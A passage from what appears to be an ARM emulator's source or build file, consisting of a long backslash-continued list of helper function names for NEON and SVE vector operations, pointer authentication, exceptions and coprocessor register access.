helper_neon_cge_s32 \ helper_neon_cge_u32 \ helper_neon_pmin_s8 \ helper_neon_pmin_u8 \ helper_neon_pmin_s16 \ helper_neon_pmin_u16 \ helper_neon_pmax_s8 \ helper_neon_pmax_u8 \ helper_neon_pmax_s16 \ helper_neon_pmax_u16 \ helper_neon_abd_s8 \ helper_neon_abd_u8 \ helper_neon_abd_s16 \ helper_neon_abd_u16 \ helper_neon_abd_s32 \ helper_neon_abd_u32 \ helper_neon_shl_u16 \ helper_neon_shl_s16 \ helper_neon_rshl_s8 \ helper_neon_rshl_s16 \ helper_neon_rshl_s32 \ helper_neon_rshl_s64 \ helper_neon_rshl_u8 \ helper_neon_rshl_u16 \ helper_neon_rshl_u32 \ helper_neon_rshl_u64 \ helper_neon_qshl_u8 \ helper_neon_qshl_u16 \ helper_neon_qshl_u32 \ helper_neon_qshl_u64 \ helper_neon_qshl_s8 \ helper_neon_qshl_s16 \ helper_neon_qshl_s32 \ helper_neon_qshl_s64 \ helper_neon_qshlu_s8 \ helper_neon_qshlu_s16 \ helper_neon_qshlu_s32 \ helper_neon_qshlu_s64 \ helper_neon_qrshl_u8 \ helper_neon_qrshl_u16 \ helper_neon_qrshl_u32 \ helper_neon_qrshl_u64 \ helper_neon_qrshl_s8 \ helper_neon_qrshl_s16 \ helper_neon_qrshl_s32 \ helper_neon_qrshl_s64 \ helper_neon_add_u8 \ helper_neon_add_u16 \ helper_neon_padd_u8 \ helper_neon_padd_u16 \ helper_neon_sub_u8 \ helper_neon_sub_u16 \ helper_neon_mul_u8 \ helper_neon_mul_u16 \ helper_neon_tst_u8 \ helper_neon_tst_u16 \ helper_neon_tst_u32 \ helper_neon_ceq_u8 \ helper_neon_ceq_u16 \ helper_neon_ceq_u32 \ helper_neon_clz_u8 \ helper_neon_clz_u16 \ helper_neon_cls_s8 \ helper_neon_cls_s16 \ helper_neon_cls_s32 \ helper_neon_cnt_u8 \ helper_neon_rbit_u8 \ helper_neon_qdmulh_s16 \ helper_neon_qrdmulh_s16 \ helper_neon_qdmulh_s32 \ helper_neon_qrdmulh_s32 \ helper_neon_narrow_u8 \ helper_neon_narrow_u16 \ helper_neon_narrow_high_u8 \ helper_neon_narrow_high_u16 \ helper_neon_narrow_round_high_u8 \ helper_neon_narrow_round_high_u16 \ helper_neon_unarrow_sat8 \ helper_neon_narrow_sat_u8 \ helper_neon_narrow_sat_s8 \ helper_neon_unarrow_sat16 \ helper_neon_narrow_sat_u16 \ helper_neon_narrow_sat_s16 \ helper_neon_unarrow_sat32 \ helper_neon_narrow_sat_u32 \ helper_neon_narrow_sat_s32 \ helper_neon_widen_u8 \ helper_neon_widen_s8 \ helper_neon_widen_u16 \ helper_neon_widen_s16 \ helper_neon_addl_u16 \ helper_neon_addl_u32 \ helper_neon_paddl_u16 \ helper_neon_paddl_u32 \ helper_neon_subl_u16 \ helper_neon_subl_u32 \ helper_neon_addl_saturate_s32 \ helper_neon_addl_saturate_s64 \ helper_neon_abdl_u16 \ helper_neon_abdl_s16 \ helper_neon_abdl_u32 \ helper_neon_abdl_s32 \ helper_neon_abdl_u64 \ helper_neon_abdl_s64 \ helper_neon_mull_u8 \ helper_neon_mull_s8 \ helper_neon_mull_u16 \ helper_neon_mull_s16 \ helper_neon_negl_u16 \ helper_neon_negl_u32 \ helper_neon_qabs_s8 \ helper_neon_qneg_s8 \ helper_neon_qabs_s16 \ helper_neon_qneg_s16 \ helper_neon_qabs_s32 \ helper_neon_qneg_s32 \ helper_neon_qabs_s64 \ helper_neon_qneg_s64 \ helper_neon_abd_f32 \ helper_neon_ceq_f32 \ helper_neon_cge_f32 \ helper_neon_cgt_f32 \ helper_neon_acge_f32 \ helper_neon_acgt_f32 \ helper_neon_acge_f64 \ helper_neon_acgt_f64 \ helper_neon_qunzip8 \ helper_neon_qunzip16 \ helper_neon_qunzip32 \ helper_neon_unzip8 \ helper_neon_unzip16 \ helper_neon_qzip8 \ helper_neon_qzip16 \ helper_neon_qzip32 \ helper_neon_zip8 \ helper_neon_zip16 \ raise_exception \ raise_exception_ra \ helper_neon_tbl \ helper_v8m_stackcheck \ helper_add_setq \ helper_add_saturate \ helper_sub_saturate \ helper_add_usaturate \ helper_sub_usaturate \ helper_ssat \ helper_ssat16 \ helper_usat \ helper_usat16 \ helper_setend \ helper_wfi \ helper_wfe \ helper_yield \ helper_exception_internal \ helper_exception_with_syndrome \ helper_exception_bkpt_insn \ helper_cpsr_read \ helper_cpsr_write \ helper_cpsr_write_eret \ helper_get_user_reg \ helper_set_user_reg \ helper_set_r13_banked \ helper_get_r13_banked \ helper_msr_banked \ helper_mrs_banked \ helper_access_check_cp_reg \ helper_set_cp_reg \ helper_get_cp_reg \ helper_set_cp_reg64 \ helper_get_cp_reg64 \ helper_pre_hvc \ helper_pre_smc \ helper_shl_cc \ helper_shr_cc \ helper_sar_cc \ helper_ror_cc \ helper_pacia \ helper_pacib \ helper_pacda \ helper_pacdb \ helper_pacga \ helper_autia \ helper_autib \ helper_autda \ helper_autdb \ helper_xpaci \ helper_xpacd \ arm_is_psci_call \ arm_handle_psci_call \ helper_sve_predtest1 \ helper_sve_predtest \ helper_sve_and_pppp \ helper_sve_bic_pppp \ helper_sve_eor_pppp \ helper_sve_sel_pppp \ helper_sve_orr_pppp \ helper_sve_orn_pppp \ helper_sve_nor_pppp \ helper_sve_nand_pppp \ helper_sve_and_zpzz_b \ helper_sve_and_zpzz_h \ helper_sve_and_zpzz_s \ helper_sve_and_zpzz_d \ helper_sve_orr_zpzz_b \ helper_sve_orr_zpzz_h \ helper_sve_orr_zpzz_s \ helper_sve_orr_zpzz_d \ helper_sve_eor_zpzz_b \ helper_sve_eor_zpzz_h \ helper_sve_eor_zpzz_s \ helper_sve_eor_zpzz_d \ helper_sve_bic_zpzz_b \ helper_sve_bic_zpzz_h \ helper_sve_bic_zpzz_s \ helper_sve_bic_zpzz_d \ helper_sve_add_zpzz_b \ helper_sve_add_zpzz_h \ helper_sve_add_zpzz_s \ helper_sve_add_zpzz_d \ helper_sve_sub_zpzz_b \ helper_sve_sub_zpzz_h \ helper_sve_sub_zpzz_s \ helper_sve_sub_zpzz_d \ helper_sve_smax_zpzz_b \ helper_sve_smax_zpzz_h \ helper_sve_smax_zpzz_s \ helper_sve_smax_zpzz_d \ helper_sve_umax_zpzz_b \ helper_sve_umax_zpzz_h \ helper_sve_umax_zpzz_s \ helper_sve_umax_zpzz_d \ helper_sve_smin_zpzz_b \ helper_sve_smin_zpzz_h \ helper_sve_smin_zpzz_s \ helper_sve_smin_zpzz_d \ helper_sve_umin_zpzz_b \ helper_sve_umin_zpzz_h \ helper_sve_umin_zpzz_s \ helper_sve_umin_zpzz_d \ helper_sve_sabd_zpzz_b \ helper_sve_sabd_zpzz_h \ helper_sve_sabd_zpzz_s \ helper_sve_sabd_zpzz_d \ helper_sve_uabd_zpzz_b \ helper_sve_uabd_zpzz_h \ helper_sve_uabd_zpzz_s \ helper_sve_uabd_zpzz_d \ helper_sve_mul_zpzz_b \ helper_sve_mul_zpzz_h \ helper_sve_mul_zpzz_s \ helper_sve_mul_zpzz_d \ helper_sve_smulh_zpzz_b \ helper_sve_smulh_zpzz_h \ helper_sve_smulh_zpzz_s \ helper_sve_smulh_zpzz_d \ helper_sve_umulh_zpzz_b \ helper_sve_umulh_zpzz_h \ helper_sve_umulh_zpzz_s \ helper_sve_umulh_zpzz_d \ helper_sve_sdiv_zpzz_s \ helper_sve_sdiv_zpzz_d \ helper_sve_udiv_zpzz_s \ helper_sve_udiv_zpzz_d \ helper_sve_asr_zpzz_b \ helper_sve_lsr_zpzz_b \ helper_sve_lsl_zpzz_b \ helper_sve_asr_zpzz_h \ helper_sve_lsr_zpzz_h \ helper_sve_lsl_zpzz_h \ helper_sve_asr_zpzz_s \ helper_sve_lsr_zpzz_s \ helper_sve_lsl_zpzz_s \ helper_sve_asr_zpzz_d \ helper_sve_lsr_zpzz_d \ helper_sve_lsl_zpzz_d \ helper_sve_asr_zpzw_b \ helper_sve_lsr_zpzw_b \ helper_sve_lsl_zpzw_b \ helper_sve_asr_zpzw_h \ helper_sve_lsr_zpzw_h \ helper_sve_lsl_zpzw_h \ helper_sve_asr_zpzw_s \ helper_sve_lsr_zpzw_s \ helper_sve_lsl_zpzw_s \ helper_sve_cls_b \ helper_sve_cls_h \ helper_sve_cls_s \ helper_sve_cls_d \ helper_sve_clz_b \ helper_sve_clz_h \ helper_sve_clz_s \ helper_sve_clz_d \ helper_sve_cnt_zpz_b \ helper_sve_cnt_zpz_h \ helper_sve_cnt_zpz_s \ helper_sve_cnt_zpz_d \ helper_sve_cnot_b \ helper_sve_cnot_h \ helper_sve_cnot_s \ helper_sve_cnot_d \ helper_sve_fabs_h \ helper_sve_fabs_s \ helper_sve_fabs_d \ helper_sve_fneg_h \ helper_sve_fneg_s \ helper_sve_fneg_d \ helper_sve_not_zpz_b \ helper_sve_not_zpz_h \ helper_sve_not_zpz_s \ helper_sve_not_zpz_d \ helper_sve_sxtb_h \ helper_sve_sxtb_s \ helper_sve_sxth_s \ helper_sve_sxtb_d \ helper_sve_sxth_d \ helper_sve_sxtw_d \ helper_sve_uxtb_h \ helper_sve_uxtb_s \ helper_sve_uxth_s \ helper_sve_uxtb_d \ helper_sve_uxth_d \ helper_sve_uxtw_d \ helper_sve_abs_b \ helper_sve_abs_h \ helper_sve_abs_s \ helper_sve_abs_d \ helper_sve_neg_b \ helper_sve_neg_h \ helper_sve_neg_s \ helper_sve_neg_d \ helper_sve_revb_h \ helper_sve_revb_s \ helper_sve_revb_d \ helper_sve_revh_s \ helper_sve_revh_d \ helper_sve_revw_d \ helper_sve_rbit_b \ helper_sve_rbit_h \ helper_sve_rbit_s \ helper_sve_rbit_d \ helper_sve_asr_zzw_b \ helper_sve_lsr_zzw_b \ helper_sve_lsl_zzw_b \ helper_sve_asr_zzw_h \ helper_sve_lsr_zzw_h \ helper_sve_lsl_zzw_h \ helper_sve_asr_zzw_s \ helper_sve_lsr_zzw_s \ helper_sve_lsl_zzw_s \ helper_sve_orv_b \ helper_sve_orv_h \ helper_sve_orv_s \ helper_sve_orv_d \ helper_sve_eorv_b \ helper_sve_eorv_h \ helper_sve_eorv_s \ helper_sve_eorv_d \ helper_sve_andv_b \ helper_sve_andv_h \ helper_sve_andv_s \ helper_sve_andv_d \ helper_sve_saddv_b \ helper_sve_saddv_h \ helper_sve_saddv_s \ helper_sve_uaddv_b \ helper_sve_uaddv_h \ helper_sve_uaddv_s \ helper_sve_uaddv_d \ helper_sve_smaxv_b \ helper_sve_smaxv_h \ helper_sve_smaxv_s \ helper_sve_smaxv_d \ helper_sve_umaxv_b \ helper_sve_umaxv_h \ helper_sve_umaxv_s \ helper_sve_umaxv_d \ helper_sve_sminv_b \ helper_sve_sminv_h \ helper_sve_sminv_s \ helper_sve_sminv_d \ helper_sve_uminv_b \ helper_sve_uminv_h \ helper_sve_uminv_s \ helper_sve_uminv_d \ helper_sve_subri_b \ helper_sve_subri_h \ helper_sve_subri_s \ helper_sve_subri_d \ helper_sve_smaxi_b \ helper_sve_smaxi_h \ helper_sve_smaxi_s \ helper_sve_smaxi_d \ helper_sve_smini_b \ helper_sve_smini_h \ helper_sve_smini_s \ helper_sve_smini_d \ helper_sve_umaxi_b \ helper_sve_umaxi_h \ helper_sve_umaxi_s \ helper_sve_umaxi_d \ helper_sve_umini_b \ helper_sve_umini_h \ helper_sve_umini_s \ helper_sve_umini_d \ helper_sve_pfirst \ helper_sve_pnext \ helper_sve_clr_b \ helper_sve_clr_h \ helper_sve_clr_s \ helper_sve_clr_d \ helper_sve_movz_b \ helper_sve_movz_h \ helper_sve_movz_s \ helper_sve_movz_d \ helper_sve_asr_zpzi_b \ helper_sve_asr_zpzi_h \ helper_sve_asr_zpzi_s \ helper_sve_asr_zpzi_d \ helper_sve_lsr_zpzi_b \ helper_sve_lsr_zpzi_h \ helper_sve_lsr_zpzi_s \ helper_sve_lsr_zpzi_d \ helper_sve_lsl_zpzi_b \ helper_sve_lsl_zpzi_h \ helper_sve_lsl_zpzi_s \ helper_sve_lsl_zpzi_d \ helper_sve_asrd_b \ helper_sve_asrd_h \ helper_sve_asrd_s \ helper_sve_asrd_d \ helper_sve_mla_b \ helper_sve_mls_b \ helper_sve_mla_h \ helper_sve_mls_h \ helper_sve_mla_s \ helper_sve_mls_s \ helper_sve_mla_d \ helper_sve_mls_d \ helper_sve_index_b \ helper_sve_index_h \ helper_sve_index_s \ helper_sve_index_d \ helper_sve_adr_p32 \ helper_sve_adr_p64 \ helper_sve_adr_s32 \ helper_sve_adr_u32 \ helper_sve_fexpa_h \ helper_sve_fexpa_s \ helper_sve_fexpa_d \ helper_sve_ftssel_h \ helper_sve_ftssel_s \ helper_sve_ftssel_d \ helper_sve_sqaddi_b \ helper_sve_sqaddi_h \ helper_sve_sqaddi_s \ helper_sve_sqaddi_d \ helper_sve_uqaddi_b \ helper_sve_uqaddi_h \ helper_sve_uqaddi_s \ helper_sve_uqaddi_d \ helper_sve_uqsubi_d \ helper_sve_cpy_m_b \ helper_sve_cpy_m_h \ helper_sve_cpy_m_s \ helper_sve_cpy_m_d \ helper_sve_cpy_z_b \ helper_sve_cpy_z_h \ helper_sve_cpy_z_s \ helper_sve_cpy_z_d \ helper_sve_ext \ helper_sve_insr_b \ helper_sve_insr_h \ helper_sve_insr_s \ helper_sve_insr_d \ helper_sve_rev_b \ helper_sve_rev_h \ helper_sve_rev_s \ helper_sve_rev_d \ helper_sve_tbl_b \ helper_sve_tbl_h \ helper_sve_tbl_s \ helper_sve_tbl_d \ helper_sve_sunpk_h \ helper_sve_sunpk_s \ helper_sve_sunpk_d \ helper_sve_uunpk_h \ helper_sve_uunpk_s \ helper_sve_uunpk_d \ helper_sve_zip_p \ helper_sve_uzp_p \ helper_sve_trn_p \ helper_sve_rev_p \ helper_sve_punpk_p \ helper_sve_zip_b \ helper_sve_zip_h \ helper_sve_zip_s \ helper_sve_zip_d \ helper_sve_uzp_b \ helper_sve_uzp_h \ helper_sve_uzp_s \ helper_sve_uzp_d \ helper_sve_trn_b \ helper_sve_trn_h \ helper_sve_trn_s \ helper_sve_trn_d \ helper_sve_compact_s \ helper_sve_compact_d \ helper_sve_last_active_element \ helper_sve_splice \ helper_sve_sel_zpzz_b \ helper_sve_sel_zpzz_h \ helper_sve_sel_zpzz_s \ helper_sve_sel_zpzz_d \ helper_sve_cmpeq_ppzz_b \ helper_sve_cmpeq_ppzz_h \ helper_sve_cmpeq_ppzz_s \ helper_sve_cmpeq_ppzz_d \ helper_sve_cmpne_ppzz_b \ helper_sve_cmpne_ppzz_h \ helper_sve_cmpne_ppzz_s \ helper_sve_cmpne_ppzz_d \ helper_sve_cmpgt_ppzz_b \ helper_sve_cmpgt_ppzz_h \ helper_sve_cmpgt_ppzz_s \ helper_sve_cmpgt_ppzz_d \ helper_sve_cmpge_ppzz_b \ helper_sve_cmpge_ppzz_h \ helper_sve_cmpge_ppzz_s \ helper_sve_cmpge_ppzz_d \ helper_sve_cmphi_ppzz_b \ helper_sve_cmphi_ppzz_h \ helper_sve_cmphi_ppzz_s \ helper_sve_cmphi_ppzz_d \ helper_sve_cmphs_ppzz_b \ helper_sve_cmphs_ppzz_h \ helper_sve_cmphs_ppzz_s \ helper_sve_cmphs_ppzz_d \ helper_sve_cmpeq_ppzw_b \ helper_sve_cmpeq_ppzw_h \ helper_sve_cmpeq_ppzw_s \ helper_sve_cmpne_ppzw_b \ helper_sve_cmpne_ppzw_h \ helper_sve_cmpne_ppzw_s \ helper_sve_cmpgt_ppzw_b \ helper_sve_cmpgt_ppzw_h \ helper_sve_cmpgt_ppzw_s \ helper_sve_cmpge_ppzw_b \ helper_sve_cmpge_ppzw_h \ helper_sve_cmpge_ppzw_s \ helper_sve_cmphi_ppzw_b \ helper_sve_cmphi_ppzw_h \ helper_sve_cmphi_ppzw_s \ helper_sve_cmphs_ppzw_b \ helper_sve_cmphs_ppzw_h \ helper_sve_cmphs_ppzw_s \ helper_sve_cmplt_ppzw_b \ helper_sve_cmplt_ppzw_h \ helper_sve_cmplt_ppzw_s \ helper_sve_cmple_ppzw_b \ helper_sve_cmple_ppzw_h \ helper_sve_cmple_ppzw_s \ helper_sve_cmplo_ppzw_b \ helper_sve_cmplo_ppzw_h \ helper_sve_cmplo_ppzw_s \ helper_sve_cmpls_ppzw_b \ helper_sve_cmpls_ppzw_h \ helper_sve_cmpls_ppzw_s \ helper_sve_cmpeq_ppzi_b \ helper_sve_cmpeq_ppzi_h \ helper_sve_cmpeq_ppzi_s \ helper_sve_cmpeq_ppzi_d \ helper_sve_cmpne_ppzi_b \ helper_sve_cmpne_ppzi_h \ helper_sve_cmpne_ppzi_s \ helper_sve_cmpne_ppzi_d \ helper_sve_cmpgt_ppzi_b \ helper_sve_cmpgt_ppzi_h \ helper_sve_cmpgt_ppzi_s \ helper_sve_cmpgt_ppzi_d \ helper_sve_cmpge_ppzi_b \ helper_sve_cmpge_ppzi_h \ helper_sve_cmpge_ppzi_s \ helper_sve_cmpge_ppzi_d \ helper_sve_cmphi_ppzi_b \ helper_sve_cmphi_ppzi_h \ helper_sve_cmphi_ppzi_s \ helper_sve_cmphi_ppzi_d \ helper_sve_cmphs_ppzi_b \ helper_sve_cmphs_ppzi_h \ helper_sve_cmphs_ppzi_s \ helper_sve_cmphs_ppzi_d \ helper_sve_cmplt_ppzi_b \ helper_sve_cmplt_ppzi_h \ helper_sve_cmplt_ppzi_s \ helper_sve_cmplt_ppzi_d \ helper_sve_cmple_ppzi_b \ helper_sve_cmple_ppzi_h \ helper_sve_cmple_ppzi_s \ helper_sve_cmple_ppzi_d \ helper_sve_cmplo_ppzi_b \ helper_sve_cmplo_ppzi_h \ helper_sve_cmplo_ppzi_s \ helper_sve_cmplo_ppzi_d \ helper_sve_cmpls_ppzi_b \ helper_sve_cmpls_ppzi_h \ helper_sve_cmpls_ppzi_s \ helper_sve_cmpls_ppzi_d \ helper_sve_brkpa \ helper_sve_brkpas \ helper_sve_brkpb \ helper_sve_brkpbs \ helper_sve_brka_z \ helper_sve_brkas_z \ helper_sve_brkb_z \ helper_sve_brkbs_z \ helper_sve_brka_m \ helper_sve_brkas_m \ helper_sve_brkb_m \ helper_sve_brkbs_m \ helper_sve_brkn \ helper_sve_brkns \ helper_sve_cntp \ helper_sve_while \ helper_sve_faddv_h \ helper_sve_faddv_s \ helper_sve_faddv_d \ helper_sve_fminnmv_h \ helper_sve_fminnmv_s \ helper_sve_fminnmv_d \ helper_sve_fmaxnmv_h \ helper_sve_fmaxnmv_s \ helper_sve_fmaxnmv_d \ helper_sve_fminv_h \ helper_sve_fminv_s \ helper_sve_fminv_d \ helper_sve_fmaxv_h \ helper_sve_fmaxv_s \ helper_sve_fmaxv_d \ helper_sve_fadda_h \ helper_sve_fadda_s \ helper_sve_fadda_d \ helper_sve_fadd_h \ helper_sve_fadd_s \ helper_sve_fadd_d \ helper_sve_fsub_h \ helper_sve_fsub_s \ helper_sve_fsub_d \ helper_sve_fmul_h \ helper_sve_fmul_s \ helper_sve_fmul_d \ helper_sve_fdiv_h \ helper_sve_fdiv_s \ helper_sve_fdiv_d \ helper_sve_fmin_h \ helper_sve_fmin_s \ helper_sve_fmin_d \ helper_sve_fmax_h \ helper_sve_fmax_s \ helper_sve_fmax_d \ helper_sve_fminnum_h \ helper_sve_fminnum_s \ helper_sve_fminnum_d \ helper_sve_fmaxnum_h \ helper_sve_fmaxnum_s \ helper_sve_fmaxnum_d \ helper_sve_fabd_h \ helper_sve_fabd_s \ helper_sve_fabd_d \ helper_sve_fscalbn_h \ helper_sve_fscalbn_s \ helper_sve_fscalbn_d \ helper_sve_fmulx_h \ helper_sve_fmulx_s \ helper_sve_fmulx_d \ helper_sve_fadds_h \ helper_sve_fadds_s \ helper_sve_fadds_d \ helper_sve_fsubs_h \ helper_sve_fsubs_s \ helper_sve_fsubs_d \ helper_sve_fmuls_h \ helper_sve_fmuls_s \ helper_sve_fmuls_d \ helper_sve_fsubrs_h \ helper_sve_fsubrs_s \ helper_sve_fsubrs_d \ helper_sve_fmaxnms_h \ helper_sve_fmaxnms_s \ helper_sve_fmaxnms_d \ helper_sve_fminnms_h \ helper_sve_fminnms_s \ helper_sve_fminnms_d \ helper_sve_fmaxs_h \ helper_sve_fmaxs_s \ helper_sve_fmaxs_d \ helper_sve_fmins_h \ helper_sve_fmins_s \ helper_sve_fmins_d \ helper_sve_fcvt_sh \ helper_sve_fcvt_hs \ helper_sve_fcvt_dh \ helper_sve_fcvt_hd \ helper_sve_fcvt_ds \ helper_sve_fcvt_sd \ helper_sve_fcvtzs_hh \ helper_sve_fcvtzs_hs \ helper_sve_fcvtzs_ss \ helper_sve_fcvtzs_hd \ helper_sve_fcvtzs_sd \ helper_sve_fcvtzs_ds \ helper_sve_fcvtzs_dd \ helper_sve_fcvtzu_hh \ helper_sve_fcvtzu_hs \ helper_sve_fcvtzu_ss \ helper_sve_fcvtzu_hd \ helper_sve_fcvtzu_sd \ helper_sve_fcvtzu_ds \ helper_sve_fcvtzu_dd \ helper_sve_frint_h \ helper_sve_frint_s \ helper_sve_frint_d \ helper_sve_frintx_h \ helper_sve_frintx_s \ helper_sve_frintx_d \ helper_sve_frecpx_h \ helper_sve_frecpx_s \ helper_sve_frecpx_d \ helper_sve_fsqrt_h \ helper_sve_fsqrt_s \ helper_sve_fsqrt_d \ helper_sve_scvt_hh \ helper_sve_scvt_sh \ helper_sve_scvt_ss \ helper_sve_scvt_sd \ helper_sve_scvt_dh \ helper_sve_scvt_ds \ helper_sve_scvt_dd \ helper_sve_ucvt_hh \ helper_sve_ucvt_sh \ helper_sve_ucvt_ss \ helper_sve_ucvt_sd \ helper_sve_ucvt_dh \ helper_sve_ucvt_ds \ helper_sve_ucvt_dd \ helper_sve_fmla_zpzzz_h \ helper_sve_fmls_zpzzz_h \ helper_sve_fnmla_zpzzz_h \ helper_sve_fnmls_zpzzz_h \ helper_sve_fmla_zpzzz_s \ helper_sve_fmls_zpzzz_s \ helper_sve_fnmla_zpzzz_s \ helper_sve_fnmls_zpzzz_s \ helper_sve_fmla_zpzzz_d \ helper_sve_fmls_zpzzz_d \ helper_sve_fnmla_zpzzz_d \ helper_sve_fnmls_zpzzz_d \ helper_sve_fcmge_h \ helper_sve_fcmge_s \ helper_sve_fcmge_d \ helper_sve_fcmgt_h \ helper_sve_fcmgt_s \ helper_sve_fcmgt_d \ helper_sve_fcmeq_h \ helper_sve_fcmeq_s \ helper_sve_fcmeq_d \ helper_sve_fcmne_h \ helper_sve_fcmne_s \ helper_sve_fcmne_d \ helper_sve_fcmuo_h \ helper_sve_fcmuo_s \ helper_sve_fcmuo_d \ helper_sve_facge_h \ helper_sve_facge_s \ helper_sve_facge_d \ helper_sve_facgt_h \ helper_sve_facgt_s \ helper_sve_facgt_d \ helper_sve_fcmge0_h \ helper_sve_fcmge0_s \ helper_sve_fcmge0_d \ helper_sve_fcmgt0_h \ helper_sve_fcmgt0_s \ helper_sve_fcmgt0_d \ helper_sve_fcmle0_h \ helper_sve_fcmle0_s \ helper_sve_fcmle0_d \ helper_sve_fcmlt0_h \ helper_sve_fcmlt0_s \ helper_sve_fcmlt0_d \ helper_sve_fcmeq0_h \ helper_sve_fcmeq0_s \ helper_sve_fcmeq0_d \ helper_sve_fcmne0_h \ helper_sve_fcmne0_s \ helper_sve_fcmne0_d \ helper_sve_ftmad_h \ helper_sve_ftmad_s \ helper_sve_ftmad_d \ helper_sve_fcadd_h \ helper_sve_fcadd_s \ helper_sve_fcadd_d \ helper_sve_fcmla_zpzzz_h \ helper_sve_fcmla_zpzzz_s \ helper_sve_fcmla_zpzzz_d \ helper_sve_ld1bb_r \ helper_sve_ld1bhu_r \ helper_sve_ld1bhs_r \ helper_sve_ld1bsu_r \ helper_sve_ld1bss_r \ helper_sve_ld1bdu_r \ helper_sve_ld1bds_r \ helper_sve_ld1hh_le_r \ helper_sve_ld1hh_be_r \ helper_sve_ld1hsu_le_r \ helper_sve_ld1hsu_be_r \ helper_sve_ld1hss_le_r \ helper_sve_ld1hss_be_r \ helper_sve_ld1hdu_le_r \ helper_sve_ld1hdu_be_r \ helper_sve_ld1hds_le_r \ helper_sve_ld1hds_be_r \ helper_sve_ld1ss_le_r \ helper_sve_ld1ss_be_r \ helper_sve_ld1sdu_le_r \ helper_sve_ld1sdu_be_r \ helper_sve_ld1sds_le_r \ helper_sve_ld1sds_be_r \ helper_sve_ld1dd_le_r \ helper_sve_ld1dd_be_r \ helper_sve_ld2bb_r \ helper_sve_ld3bb_r \ helper_sve_ld4bb_r \ helper_sve_ld2hh_le_r \ helper_sve_ld2hh_be_r \ helper_sve_ld3hh_le_r \ helper_sve_ld3hh_be_r \ helper_sve_ld4hh_le_r \ helper_sve_ld4hh_be_r \ helper_sve_ld2ss_le_r \ helper_sve_ld2ss_be_r \ helper_sve_ld3ss_le_r \ helper_sve_ld3ss_be_r \ helper_sve_ld4ss_le_r \ helper_sve_ld4ss_be_r \ helper_sve_ld2dd_le_r \ helper_sve_ld2dd_be_r \ helper_sve_ld3dd_le_r \ helper_sve_ld3dd_be_r \ helper_sve_ld4dd_le_r \ helper_sve_ld4dd_be_r \ helper_sve_ldff1bb_r \ helper_sve_ldnf1bb_r \ helper_sve_ldff1bhu_r \ helper_sve_ldnf1bhu_r \ helper_sve_ldff1bhs_r \ helper_sve_ldnf1bhs_r \ helper_sve_ldff1bsu_r \ helper_sve_ldnf1bsu_r \ helper_sve_ldff1bss_r \ helper_sve_ldnf1bss_r \ helper_sve_ldff1bdu_r \ helper_sve_ldnf1bdu_r \ helper_sve_ldff1bds_r \ helper_sve_ldnf1bds_r \ helper_sve_ldff1hh_le_r \ helper_sve_ldnf1hh_le_r \ helper_sve_ldff1hh_be_r \ helper_sve_ldnf1hh_be_r \ helper_sve_ldff1hsu_le_r \ helper_sve_ldnf1hsu_le_r \ helper_sve_ldff1hsu_be_r \ helper_sve_ldnf1hsu_be_r \ helper_sve_ldff1hss_le_r \ helper_sve_ldnf1hss_le_r \ helper_sve_ldff1hss_be_r \ helper_sve_ldnf1hss_be_r \ helper_sve_ldff1hdu_le_r \ helper_sve_ldnf1hdu_le_r \ helper_sve_ldff1hdu_be_r \ helper_sve_ldnf1hdu_be_r \ helper_sve_ldff1hds_le_r \ helper_sve_ldnf1hds_le_r \ helper_sve_ldff1hds_be_r \ helper_sve_ldnf1hds_be_r \ helper_sve_ldff1ss_le_r \ helper_sve_ldnf1ss_le_r \ helper_sve_ldff1ss_be_r \ helper_sve_ldnf1ss_be_r \ helper_sve_ldff1sdu_le_r \ helper_sve_ldnf1sdu_le_r \ helper_sve_ldff1sdu_be_r \ helper_sve_ldnf1sdu_be_r \ helper_sve_ldff1sds_le_r \ helper_sve_ldnf1sds_le_r \ helper_sve_ldff1sds_be_r \ helper_sve_ldnf1sds_be_r \ helper_sve_ldff1dd_le_r \ helper_sve_ldnf1dd_le_r \ helper_sve_ldff1dd_be_r \ helper_sve_ldnf1dd_be_r \ helper_sve_st1bb_r \ helper_sve_st1bh_r \ helper_sve_st1bs_r \ helper_sve_st1bd_r \ helper_sve_st2bb_r \ helper_sve_st3bb_r \ helper_sve_st4bb_r \ helper_sve_st1hh_le_r \ helper_sve_st1hh_be_r \ helper_sve_st1hs_le_r \ helper_sve_st1hs_be_r \ helper_sve_st1hd_le_r \ helper_sve_st1hd_be_r \ helper_sve_st2hh_le_r \ helper_sve_st2hh_be_r \ helper_sve_st3hh_le_r \ helper_sve_st3hh_be_r \ helper_sve_st4hh_le_r \ helper_sve_st4hh_be_r \ helper_sve_st1ss_le_r \ helper_sve_st1ss_be_r \ helper_sve_st1sd_le_r \ helper_sve_st1sd_be_r \ helper_sve_st2ss_le_r \ helper_sve_st2ss_be_r \ helper_sve_st3ss_le_r \ helper_sve_st3ss_be_r \ helper_sve_st4ss_le_r \ helper_sve_st4ss_be_r \ helper_sve_st1dd_le_r \ helper_sve_st1dd_be_r \ helper_sve_st2dd_le_r \ helper_sve_st2dd_be_r \ helper_sve_st3dd_le_r \ helper_sve_st3dd_be_r \ helper_sve_st4dd_le_r \ helper_sve_st4dd_be_r \ helper_sve_ldbsu_zsu \ helper_sve_ldbsu_zss \ helper_sve_ldbdu_zsu \ helper_sve_ldbdu_zss \ helper_sve_ldbdu_zd \ helper_sve_ldbss_zsu \ helper_sve_ldbss_zss \ helper_sve_ldbds_zsu \ helper_sve_ldbds_zss \ helper_sve_ldbds_zd \ helper_sve_ldhsu_le_zsu \ helper_sve_ldhsu_le_zss \ helper_sve_ldhdu_le_zsu \ helper_sve_ldhdu_le_zss \ helper_sve_ldhdu_le_zd \ helper_sve_ldhsu_be_zsu \ helper_sve_ldhsu_be_zss \ helper_sve_ldhdu_be_zsu \ helper_sve_ldhdu_be_zss \ helper_sve_ldhdu_be_zd \ helper_sve_ldhss_le_zsu \ helper_sve_ldhss_le_zss \ helper_sve_ldhds_le_zsu \ helper_sve_ldhds_le_zss \ helper_sve_ldhds_le_zd \ helper_sve_ldhss_be_zsu \ helper_sve_ldhss_be_zss \ helper_sve_ldhds_be_zsu \ helper_sve_ldhds_be_zss \ helper_sve_ldhds_be_zd \ helper_sve_ldss_le_zsu \ helper_sve_ldss_le_zss \ helper_sve_ldsdu_le_zsu \ helper_sve_ldsdu_le_zss \ helper_sve_ldsdu_le_zd \ helper_sve_ldss_be_zsu \ helper_sve_ldss_be_zss \ helper_sve_ldsdu_be_zsu \ helper_sve_ldsdu_be_zss \ helper_sve_ldsdu_be_zd \ helper_sve_ldsds_le_zsu \ helper_sve_ldsds_le_zss \ helper_sve_ldsds_le_zd \ helper_sve_ldsds_be_zsu \ 